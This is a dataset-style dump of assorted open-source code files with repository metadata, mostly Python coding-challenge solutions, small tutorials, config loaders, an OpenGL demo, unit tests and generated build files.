blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
06a22bd4d2ef980a8bf8ceb2a13a88b006b28f39
|
5a82795c3860745112b7410d9060c5ef671adba0
|
/leetcode/Kth Smallest Element in a BST.py
|
b169e7cff32636d2f2a3af72ff6449ae26da5f4b
|
[] |
no_license
|
ashishvista/geeks
|
8e09d0f3a422c1c9a1c1b19d879ebafa31b62f44
|
1677a304fc7857a3054b574e8702491f5ce01a04
|
refs/heads/master
| 2023-03-05T12:01:03.911096
| 2021-02-15T03:00:56
| 2021-02-15T03:00:56
| 336,996,558
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
# Definition for a binary tree node.
from collections import deque
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def deserialize(arr):
n = len(arr)
dq = deque()
root = TreeNode(int(arr[0]))
dq.append(root)
i = 1
while dq:
top = dq.popleft()
if i < n:
if arr[i] != "null":
top.left = TreeNode(int(arr[i]))
dq.append(top.left)
if (i + 1) < n:
if arr[i + 1] != "null":
top.right = TreeNode(int(arr[i + 1]))
dq.append(top.right)
i += 2
return root
class Solution:
def kthSmallest(self, root: TreeNode, k: int) -> int:
if root is None:
return []
st = []
c = 0
while True:
while root:
st.append(root)
root = root.left
root = st.pop()
c += 1
if c == k:
return root.val
root = root.right
if __name__ == "__main__":
arr = input().strip()[1:-1].split(",")
k = int(input())
root = deserialize(arr)
res = Solution().kthSmallest(root, k)
print(res)
|
[
"ashish@groomefy.com"
] |
ashish@groomefy.com
|
a49e3ed005188518b84eb367a76afe8c6aed96d3
|
2a5f67db7dfe10c21ee5a148731c4e95cf5f613a
|
/30 Days of Code/Day 24 - More Linked Lists.py
|
7fe94449c1d6e0bf7eeac377f35f9172729ebeb4
|
[] |
no_license
|
bayoishola20/HackerRank
|
b8d49da0ff648463fda4e590b662b8914550402c
|
466b17c326ccaf208239fa40dee014efeb9b8561
|
refs/heads/master
| 2021-09-06T09:19:51.979879
| 2018-02-04T23:40:02
| 2018-02-04T23:40:02
| 64,167,170
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
#==================== GIVEN CODE ======================#
class Node:
def __init__(self,data):
self.data = data
self.next = None
class Solution:
def insert(self,head,data):
p = Node(data)
if head==None:
head=p
elif head.next==None:
head.next=p
else:
start=head
while(start.next!=None):
start=start.next
start.next=p
return head
def display(self,head):
current = head
while current:
print current.data,
current = current.next
#===================== END =========================#
def removeDuplicates(self,head):
#Write your code here
node = head
while node and node.next:
while node.next and node.data is node.next.data:
node.next = node.next.next
node = node.next
return head # return head
#==================== GIVEN CODE ======================#
mylist= Solution()
T=int(input())
head=None
for i in range(T):
data=int(input())
head=mylist.insert(head,data)
head=mylist.removeDuplicates(head)
mylist.display(head);
#===================== END =========================#
|
[
"bayoishola20@yahoo.com"
] |
bayoishola20@yahoo.com
|
59be0bf880afb7289bde3428351fe26aef1322ec
|
bda892fd07e3879df21dcd1775c86269587e7e07
|
/leetcode/0058_E_最后一个单词的长度.py
|
140ca073f044a5177a84e26a03f62afdfde003a6
|
[] |
no_license
|
CrzRabbit/Python
|
46923109b6e516820dd90f880f6603f1cc71ba11
|
055ace9f0ca4fb09326da77ae39e33173b3bde15
|
refs/heads/master
| 2021-12-23T15:44:46.539503
| 2021-09-23T09:32:42
| 2021-09-23T09:32:42
| 119,370,525
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
'''
给你一个字符串 s,由若干单词组成,单词之间用空格隔开。返回字符串中最后一个单词的长度。如果不存在最后一个单词,请返回 0 。
单词 是指仅由字母组成、不包含任何空格字符的最大子字符串。
示例 1:
输入:s = "Hello World"
输出:5
示例 2:
输入:s = " "
输出:0
提示:
1 <= s.length <= 104
s 仅有英文字母和空格 ' ' 组成
'''
class Solution:
def _lengthOfLastWord(self, s: str) -> int:
left = -1
right = -1
index = len(s) - 1
while index >= 0:
if right < 0 and s[index] != ' ':
right = index
if right > 0 and s[index] == ' ':
left = index
break
index -= 1
print(right, left)
return right - left
def lengthOfLastWord(self, s: str) -> int:
return len(s.split()[-1:][0])
so = Solution()
print(so.lengthOfLastWord('b a '))
|
[
"1016864609@qq.com"
] |
1016864609@qq.com
|
3f006e7288b20ee04ed3cd9979855e75f941bfc2
|
2dd560dc468af0af4ca44cb4cd37a0b807357063
|
/Leetcode/1441. Build an Array With Stack Operations/solution2.py
|
6a4545eaa5d00ee6fae207f89c0238a4684c2e0d
|
[
"MIT"
] |
permissive
|
hi0t/Outtalent
|
460fe4a73788437ba6ce9ef1501291035c8ff1e8
|
8a10b23335d8e9f080e5c39715b38bcc2916ff00
|
refs/heads/master
| 2023-02-26T21:16:56.741589
| 2021-02-05T13:36:50
| 2021-02-05T13:36:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 255
|
py
|
class Solution:
def buildArray(self, target: List[int], n: int) -> List[str]:
result = []
for i in range(1, max(target) + 1):
result.append("Push")
if i not in target: result.append("Pop")
return result
|
[
"info@crazysquirrel.ru"
] |
info@crazysquirrel.ru
|
36dad26e1bf89e1f0c9698c64e31fcf54f3fc7c0
|
37d9bb2869fe491a67c97de6adc3e0e1693ff82a
|
/StringMethods.py
|
6d8af7c493506723fa8c73866f566114291010f2
|
[] |
no_license
|
qinyanjuidavid/Self-Learning
|
ffbcb62f2204c5dedd0cde3a116b653da77b3702
|
8c6a5b3a7f250af99538e9f23d01d8a09839b702
|
refs/heads/master
| 2023-03-31T10:20:21.225642
| 2021-04-03T08:04:27
| 2021-04-03T08:04:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 680
|
py
|
#strip(), len(),lower(),upper(),split()
name=" Hello "
print(name.strip())#It removes all the spaces in a string
nums=" 1 2 3 1 4 "
print(nums.strip())#The spaces removed are before and after
print(len(name)) #Checks the length of the string
name="JOHN DOE"
print(name.lower()) #changes the strings to be in lower case
name="jane Doe"
print(name.upper()) #Changes the string to upper case
name="JOHN DOE"
print(name.split()) #Changes the string to a string
print(type(name.split()))
#Count() and find() methodss
s="Hello"
print(s.find('o'))
print(s.find('l'))
print(s.find('s'))#Python does not find s
print(s.count('h'))
print(s.count('l'))
print(s.count('z'))#Zero 'z'
|
[
"davidkinyanjui052@gmail.com"
] |
davidkinyanjui052@gmail.com
|
1179ed1a0a4a8b465f26500da471f61dec3bfdb5
|
5251a6be594dff7e56bbe6b4f968ea43c3315471
|
/atoll/config.py
|
5dd83a5e843ac4f91ecf18cf5ba16b102eadb80f
|
[
"Apache-2.0"
] |
permissive
|
coralproject/atoll
|
aec2e529fd7c5164864c4a2e9a501a8477fc3872
|
2b62b37d3a320480264c4a0242532aad99c338ec
|
refs/heads/master
| 2021-07-14T03:39:09.761086
| 2016-07-26T18:57:16
| 2016-07-26T18:57:16
| 43,079,410
| 12
| 1
|
NOASSERTION
| 2021-03-19T21:53:15
| 2015-09-24T16:37:32
|
Python
|
UTF-8
|
Python
| false
| false
| 437
|
py
|
"""
Loads the service configuration.
"""
import os
import yaml
conf = {
'worker_broker': 'amqp://guest:guest@localhost/',
'worker_backend': 'amqp',
'executor_host': '127.0.0.1:8786'
}
user_conf_path = os.environ.get('ATOLL_CONF', None)
if user_conf_path is not None:
with open(user_conf_path, 'r') as f:
conf.update(yaml.load(f))
namespace = globals()
for k, v in conf.items():
namespace[k.upper()] = v
|
[
"f+accounts@frnsys.com"
] |
f+accounts@frnsys.com
|
cd41d985c603ed0a4723965bfa70df8a138d1f06
|
f95d2646f8428cceed98681f8ed2407d4f044941
|
/FlaskDemo04/run01.py
|
97f6b559d276571f0ef32a6508c258ebd248ba6e
|
[] |
no_license
|
q2806060/python-note
|
014e1458dcfa896f2749c7ebce68b2bbe31a3bf8
|
fbe107d668b44b78ae0094dbcc7e8ff8a4f8c983
|
refs/heads/master
| 2020-08-18T01:12:31.227654
| 2019-10-17T07:40:40
| 2019-10-17T07:40:40
| 215,731,114
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
#导入pymysql用来替代MySQLdb
import pymysql
# pymysql.install_as_MySQLdb()
app = Flask(__name__)
#为app指定连库字符
app.config['SQLALCHEMY_DATABASE_URI']="mysql+pymysql://root:123456@localhost:3306/flask"
#取消SQLAlchemy的信号追踪
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
#创建SQLAlchemy程序实例
db = SQLAlchemy(app)
if __name__ == "__main__":
app.run(debug=True)
|
[
"C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn"
] |
C8916BA958F57D5A740E38E94644A3F8@i-search.com.cn
|
c9816561b3e191bbcd544b2288a6e29705b965fe
|
60dd6073a3284e24092620e430fd05be3157f48e
|
/tiago_public_ws/build/pal_gripper/pal_gripper/catkin_generated/pkg.develspace.context.pc.py
|
ffa8184246ae074a71bbd494df35fa3b06cbfed1
|
[] |
no_license
|
SakshayMahna/Programming-Robots-with-ROS
|
e94d4ec5973f76d49c81406f0de43795bb673c1e
|
203d97463d07722fbe73bdc007d930b2ae3905f1
|
refs/heads/master
| 2020-07-11T07:28:00.547774
| 2019-10-19T08:05:26
| 2019-10-19T08:05:26
| 204,474,383
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "pal_gripper"
PROJECT_SPACE_DIR = "/media/root/BuntuDrive/Programming-Robots-with-ROS/tiago_public_ws/devel"
PROJECT_VERSION = "1.0.2"
|
[
"sakshum19@gmail.com"
] |
sakshum19@gmail.com
|
f903c442aee0263c16da660e86b0ec16555e3da6
|
d45de88d276bfa76ad0345b718c50f5d3c0f3d7f
|
/days_until_event.py
|
c3d8fafc5001f53f473ee5c63372eb3e0ab29e38
|
[] |
no_license
|
donniewherman/Pythonista_scene
|
3c6d5ffa07f4c63fe06ee75d54937c8ea98387e8
|
11e43bf94c70c10fe74f931a7ab43df9ccf4e3d1
|
refs/heads/master
| 2021-01-17T06:00:12.676067
| 2015-08-07T21:40:41
| 2015-08-07T21:40:41
| 42,383,096
| 1
| 0
| null | 2015-09-13T04:02:48
| 2015-09-13T04:02:47
| null |
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
# See: https://omz-forums.appspot.com/pythonista/post/6142748495183872
import console, datetime, scene
fmt = '{} is {} days away.'
class days_until_event(scene.Scene):
def __init__(self, event_name, event_date):
self.event_name = event_name
self.event_date = event_date
scene.run(self)
def setup(self):
self.center = self.bounds.center()
self.font_size = 64 if self.size.w > 700 else 32
def draw(self):
scene.background(0, 0, 0)
msg = fmt.format(self.event_name, (self.event_date - datetime.date.today()).days)
scene.text(msg, 'Futura', self.font_size, *self.center)
prompt = '''Please enter the event name.
i.e. First day of school'''
event_name = console.input_alert('Event', prompt, '', 'Enter').strip() or 'My event'
prompt = '''Please enter the date you would like to countdown to.
i.e. 2009 (year),6 (month),29 (day)'''
event_date = console.input_alert('Date', prompt, '', 'Enter')
try:
year, month, day = [int(s.strip()) for s in event_date.split(',')]
event_date = datetime.date(year, month, day)
except ValueError:
exit('Incorrect date format (must be "year, month, day")')
days_until_event(event_name, event_date)
|
[
"cclauss@bluewin.ch"
] |
cclauss@bluewin.ch
|
8f362b8ed7c76e2766013bb4e6803278ae161094
|
981d425745639e5338de6847184fac2ab0175ce8
|
/src/test.py
|
087de4f1eb7b797d4bdeeecfa6a5b65c9a23e61e
|
[] |
no_license
|
exploring-realities/Mobi
|
17f06dd0fcdda30eab9519992d29d2530f4bc307
|
f6f0e5d779424979d32e8175066bebe83399f289
|
refs/heads/master
| 2021-07-06T05:28:15.451058
| 2017-10-01T22:53:00
| 2017-10-01T22:53:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
#!/usr/bin/python
import datetime
import crawler
now = datetime.datetime.now()
on = str(now.day) + "." + str(now.month) + "." + str(now.year)
at = str(now.hour) + ":" + str(now.minute)
response_json = crawler.request_station_info("Hallerstrasse", at, on)
print response_json
|
[
"vinh-ngu@hotmail.com"
] |
vinh-ngu@hotmail.com
|
d432478397bf133a423bca8172f73dfbdf6dd036
|
a34e3d435f48ef87477d3ae13ca8a43015e5052c
|
/pyopengl2.py
|
788e2feeea3f13c7cc5bba01fafc836249f2b5da
|
[] |
no_license
|
haehn/sandbox
|
636069372fc7bb7fd72b5fde302f42b815e8e9b0
|
e49a0a30a1811adb73577ff697d81db16ca82808
|
refs/heads/master
| 2021-01-22T03:39:03.415863
| 2015-02-11T23:16:22
| 2015-02-11T23:16:22
| 26,128,048
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,880
|
py
|
import sys
from OpenGL.GLUT import *
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GL import shaders
from OpenGL.arrays import vbo
# from vrml.arrays import *
from numpy import concatenate, identity, transpose, multiply
import numpy
from datetime import datetime
class Sample15:
def __init__(self):
self.current_time = None
self.current_angle = 0.0
vertex_shader = shaders.compileShader("""
attribute vec4 vPosition;
attribute vec4 vColor;
uniform mat4 modelMatrix;
uniform float rotationAngle;
varying vec4 varyingColor;
// function from http://www.neilmendoza.com/glsl-rotation-about-an-arbitrary-axis/
mat4 rotationMatrix(vec3 axis, float angle) {
axis = normalize(axis);
float s = sin(angle);
float c = cos(angle);
float oc = 1.0 - c;
return mat4(oc * axis.x * axis.x + c, oc * axis.x * axis.y - axis.z * s, oc * axis.z * axis.x + axis.y * s, 0.0,
oc * axis.x * axis.y + axis.z * s, oc * axis.y * axis.y + c, oc * axis.y * axis.z - axis.x * s, 0.0,
oc * axis.z * axis.x - axis.y * s, oc * axis.y * axis.z + axis.x * s, oc * axis.z * axis.z + c, 0.0,
0.0, 0.0, 0.0, 1.0);
}
void main() {
mat4 rotation = rotationMatrix(vec3(0.1, 0.2, 0.3), rotationAngle);
gl_Position = modelMatrix * rotation * vPosition;
varyingColor = vColor;
}""", GL_VERTEX_SHADER)
fragment_shader = shaders.compileShader("""
varying vec4 varyingColor;
void main() {
gl_FragColor = varyingColor;
}""", GL_FRAGMENT_SHADER)
self.shader = shaders.compileProgram(vertex_shader, fragment_shader)
shaders.glUseProgram(self.shader)
self.position_location = glGetAttribLocation(
self.shader, 'vPosition'
)
self.color_location = glGetAttribLocation(
self.shader, 'vColor'
)
self.model_matrix_location = glGetUniformLocation(
self.shader, 'modelMatrix'
)
self.rotation_angle_location = glGetUniformLocation(
self.shader, 'rotationAngle'
)
vertex_positions = numpy.array([
-1.0, -1.0, -1.0, 1.0,
-1.0, -1.0, 1.0, 1.0,
-1.0, 1.0, -1.0, 1.0,
-1.0, 1.0, 1.0, 1.0,
1.0, -1.0, -1.0, 1.0,
1.0, -1.0, 1.0, 1.0,
1.0, 1.0, -1.0, 1.0,
1.0, 1.0, 1.0, 1.0
], dtype=numpy.float32)
vertex_colors = numpy.array([
1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 0.0, 1.0,
1.0, 0.0, 1.0, 1.0,
1.0, 0.0, 0.0, 1.0,
0.0, 1.0, 1.0, 1.0,
0.0, 1.0, 0.0, 1.0,
0.0, 0.0, 1.0, 1.0,
0.5, 0.5, 0.5, 1.0
], dtype=numpy.float32)
self.vertex_buffer_object = vbo.VBO(concatenate((vertex_positions, vertex_colors)))
self.vertex_buffer_object.bind()
self.vertex_indices = vbo.VBO(
numpy.array([
0, 1, 2, 3, 6, 7, 4, 5,
0xFFFF,
2, 6, 0, 4, 1, 5, 3, 7
], dtype=numpy.uint32),
target=GL_ELEMENT_ARRAY_BUFFER)
self.vertex_indices.bind()
glEnable(GL_PRIMITIVE_RESTART)
glPrimitiveRestartIndex(0xFFFF)
glVertexAttribPointer(
self.position_location,
4, GL_FLOAT, False, 0, self.vertex_buffer_object
)
glEnableVertexAttribArray(self.position_location)
glVertexAttribPointer(
self.color_location,
4, GL_FLOAT, False, 0, self.vertex_buffer_object + vertex_positions.nbytes
)
glEnableVertexAttribArray(self.color_location)
glEnable(GL_DEPTH_TEST)
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glBlendEquation(GL_FUNC_SUBTRACT)
render_buffer_color = glGenRenderbuffers(1)
render_buffer_depth = glGenRenderbuffers(1)
glBindRenderbuffer(GL_RENDERBUFFER, render_buffer_color)
glRenderbufferStorage(GL_RENDERBUFFER, GL_RGBA, 256, 256)
glBindRenderbuffer(GL_RENDERBUFFER, render_buffer_depth)
glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH_COMPONENT24, 256, 256)
self.framebuffer = glGenFramebuffers(1)
glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self.framebuffer)
glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_COLOR_ATTACHMENT0,
GL_RENDERBUFFER, render_buffer_color)
glFramebufferRenderbuffer(GL_DRAW_FRAMEBUFFER, GL_DEPTH_ATTACHMENT,
GL_RENDERBUFFER, render_buffer_depth)
def display(self):
if self.current_time is None:
self.current_time = datetime.now()
self.delta_time = datetime.now() - self.current_time
self.current_time = datetime.now()
self.current_angle += 0.000002 * self.delta_time.microseconds
print self.current_angle
try:
# Prepare to render into the renderbuffer
glBindFramebuffer(GL_DRAW_FRAMEBUFFER, self.framebuffer)
glViewport(0, 0, 125, 125)
# Render into renderbuffer
glClearColor (1.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
translation_matrix = identity(4, 'f') # really it scale matrix there
translation_matrix[-1][-1] = 2
glUniformMatrix4fv(self.model_matrix_location, 1 , GL_TRUE, translation_matrix.tolist())
glUniform1f(self.rotation_angle_location, self.current_angle)
glDrawElements(GL_TRIANGLE_STRIP, 17, GL_UNSIGNED_INT, self.vertex_indices)
# Set up to read from the renderbuffer and draw to window-system framebuffer
glBindFramebuffer(GL_READ_FRAMEBUFFER, self.framebuffer)
glBindFramebuffer(GL_DRAW_FRAMEBUFFER, 0)
glViewport(0, 0, 250, 250)
glClearColor(0.0, 0.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# Do the copy
glBlitFramebuffer(0, 0, 125, 125, 0, 0, 125, 125,
GL_COLOR_BUFFER_BIT, GL_NEAREST)
glutSwapBuffers()
finally:
glFlush()
glutPostRedisplay()
if __name__ == '__main__':
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB | GLUT_DEPTH | GLUT_STENCIL)
glutInitWindowSize(250, 250)
glutInitWindowPosition(100, 100)
glutCreateWindow("sample 15")
sample = Sample15()
glutDisplayFunc(sample.display)
glutIdleFunc(sample.display)
glutMainLoop()
|
[
"haehn@seas.harvard.edu"
] |
haehn@seas.harvard.edu
|
267300a0c6be411af5da94c956325769ac8c743b
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_55/726.py
|
2e1116bc8beaa4f056422822aff316eb7493302d
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
#!/usr/bin/env python
import sys
def Take(k, gs, i):
'Memoize this.'
queue = gs[i:] + gs[:i]
taken = 0
N = len(gs)
f = 0
while k and f < N:
next_group = queue[f]
if next_group > k:
break
k -= next_group
taken += next_group
f += 1
return taken, f+i
def Euros(R, k, gs):
i = 0
euros = 0
N = len(gs)
_done = dict()
while R:
if i not in _done:
_done[i] = Take(k, gs, i)
(taken, i) = _done[i]
if taken == 0:
# We can go no further!
return euros
#print taken, i
euros += taken
i = i % N
R -= 1
return euros
def main():
it = iter(sys.stdin)
T = int(next(it))
for x in range(1, T+1):
R, k, N = map(int, next(it).split())
gs = map(int, next(it).split())
assert len(gs) == N
y = Euros(R, k, gs)
print "Case #%d: %d" %(x, y)
if __name__=='__main__':
main()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
4bfb6153a6a1331122310bcd35d0ddd45cc654dd
|
86c85939a566e11c87ef0cd0668ba2dd29e83b7b
|
/tests/core/val-type/test_val_type.py
|
d518d13effb9aaecb0cd406d03956f131791d13a
|
[
"NCSA",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ethereum/py-wasm
|
eca49823f5a683f125d89ed6a9c45e5f5eee7139
|
41a6d07a620dfc4f590463dd038dffe4efe0c8c6
|
refs/heads/master
| 2023-08-02T00:39:43.402121
| 2019-03-05T03:29:25
| 2019-03-05T03:29:25
| 161,232,280
| 94
| 20
|
NCSA
| 2023-02-17T18:50:24
| 2018-12-10T20:25:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,965
|
py
|
import itertools
import pytest
from wasm.datatypes import (
BitSize,
ValType,
)
@pytest.mark.parametrize(
'get_X_type,bit_size',
itertools.product(
[ValType.get_integer_type, ValType.get_float_type],
(0, 31, 33, 63, 65, BitSize.b8, BitSize.b16),
),
)
def test_get_X_type_invalid_bit_size(get_X_type, bit_size):
with pytest.raises(ValueError):
get_X_type(bit_size)
@pytest.mark.parametrize(
'value,expected',
(
(BitSize.b32, ValType.f32),
(BitSize.b64, ValType.f64),
)
)
def test_get_float_type(value, expected):
actual = ValType.get_float_type(value)
# using `is` comparison here to ensure that we are using the same object,
# not just an equal string.
assert actual is expected
@pytest.mark.parametrize(
'value,expected',
(
(BitSize.b32, ValType.i32),
(BitSize.b64, ValType.i64),
)
)
def test_get_integer_type(value, expected):
actual = ValType.get_integer_type(value)
# using `is` comparison here to ensure that we are using the same object,
# not just an equal string.
assert actual is expected
@pytest.mark.parametrize(
'value,expected',
(
(ValType.f32, True),
(ValType.f64, True),
(ValType.i32, False),
(ValType.i64, False),
)
)
def test_is_float_type(value, expected):
assert value.is_float_type is expected
@pytest.mark.parametrize(
'value,expected',
(
(ValType.f32, False),
(ValType.f64, False),
(ValType.i32, True),
(ValType.i64, True),
)
)
def test_is_integer_type(value, expected):
assert value.is_integer_type is expected
@pytest.mark.parametrize(
'value,expected',
(
(ValType.f32, BitSize.b32),
(ValType.f64, BitSize.b64),
(ValType.i32, BitSize.b32),
(ValType.i64, BitSize.b64),
),
)
def test_get_bit_size(value, expected):
assert value.bit_size == expected
|
[
"pipermerriam@gmail.com"
] |
pipermerriam@gmail.com
|
89c182daa5b7726cb8251be1c823b804cda7fcad
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_18429.py
|
359b1b34ef43ef6954446d0b6d9a5e7a29cc9db7
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 172
|
py
|
# ImportError: No module named PyQt5 - OSX Mavericks
export set PYTHONPATH=$PYTHONPATH:/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
c432933ce0fe73abcaf7f23a86fb750a7156178d
|
145205b1b9b9042a5809bf10c05b546be2f27f6f
|
/chapter07/interface_demo.py
|
a0b503cdd5a26b870bfa47440dd50e7e300bc64d
|
[] |
no_license
|
tangkaiyang/python_interface_development_and_testing
|
43ff43ee86788bcb5c07a26d81e8eef0294771ca
|
1349d309a2b551f17de3aaff266548e53dd10c4b
|
refs/heads/master
| 2020-04-25T02:06:43.543323
| 2019-03-13T06:32:10
| 2019-03-13T06:32:10
| 172,427,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
from zope.interface import Interface
from zope.interface.declarations import implementer
# 定义接口
class IHost(Interface):
def goodmorning(self, host):
"""Say good morning to host"""
@implementer(IHost) # 继承接口
class Host:
def goodmorning(self, guest):
"""Say good morning to guest"""
return "Good morning, %s!" % guest
if __name__ == '__main__':
p = Host()
hi = p.goodmorning('Tom')
print(hi)
|
[
"945541696@qq.com"
] |
945541696@qq.com
|
216517ac51305fb90d8b4e5ea4fb6742af575ab2
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayEbppInvoiceEnterpriseconsumeEnterpriseopenruleQueryResponse.py
|
5bb6da84803ce7b34c17434f46cfbd99b4b8b08a
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.EnterpriseOpenRuleInfo import EnterpriseOpenRuleInfo
class AlipayEbppInvoiceEnterpriseconsumeEnterpriseopenruleQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayEbppInvoiceEnterpriseconsumeEnterpriseopenruleQueryResponse, self).__init__()
self._enterprise_open_rule_info = None
@property
def enterprise_open_rule_info(self):
return self._enterprise_open_rule_info
@enterprise_open_rule_info.setter
def enterprise_open_rule_info(self, value):
if isinstance(value, EnterpriseOpenRuleInfo):
self._enterprise_open_rule_info = value
else:
self._enterprise_open_rule_info = EnterpriseOpenRuleInfo.from_alipay_dict(value)
def parse_response_content(self, response_content):
response = super(AlipayEbppInvoiceEnterpriseconsumeEnterpriseopenruleQueryResponse, self).parse_response_content(response_content)
if 'enterprise_open_rule_info' in response:
self.enterprise_open_rule_info = response['enterprise_open_rule_info']
|
[
"jishupei.jsp@alibaba-inc.com"
] |
jishupei.jsp@alibaba-inc.com
|
5f28a9aefa463f398ffd5a49c5f88a2014da21b2
|
a8f3204139d7f68c23bd8411b8594899ba792e79
|
/test/test_mgi.py
|
9355c91926884348daa41be469666e8d52450f2a
|
[
"BSD-3-Clause"
] |
permissive
|
switt4/sequana
|
874189c869ccc07a592c0a6a3c77999adcabe025
|
7bd4f32607d62bebfd709628abc25bfda504761b
|
refs/heads/master
| 2023-02-13T13:06:26.021426
| 2020-12-01T14:49:02
| 2020-12-01T14:49:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 170
|
py
|
from sequana.mgi import MGI
from sequana import sequana_data
def test_mgi():
m = MGI(sequana_data("test_mgi.fqStat.txt"))
m.plot_acgt()
m.boxplot_quality()
|
[
"cokelaer@gmail.com"
] |
cokelaer@gmail.com
|
587d5499f4095c8e2541f77a2b56546daa77f7a1
|
ecee6e84ba18100b621c7e06f493ae48e44a34fe
|
/build/navigation/rotate_recovery/catkin_generated/pkg.develspace.context.pc.py
|
8169a859e64afd3b5511ba8fc9b971732b77cb60
|
[] |
no_license
|
theleastinterestingcoder/Thesis
|
6d59e06b16cbe1588a6454689248c88867de2094
|
3f6945f03a58f0eff105fe879401a7f1df6f0166
|
refs/heads/master
| 2016-09-05T15:30:26.501946
| 2015-05-11T14:34:15
| 2015-05-11T14:34:15
| 31,631,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 544
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/alfred/quan_ws/src/navigation/rotate_recovery/include".split(';') if "/home/alfred/quan_ws/src/navigation/rotate_recovery/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;pluginlib".replace(';', ' ')
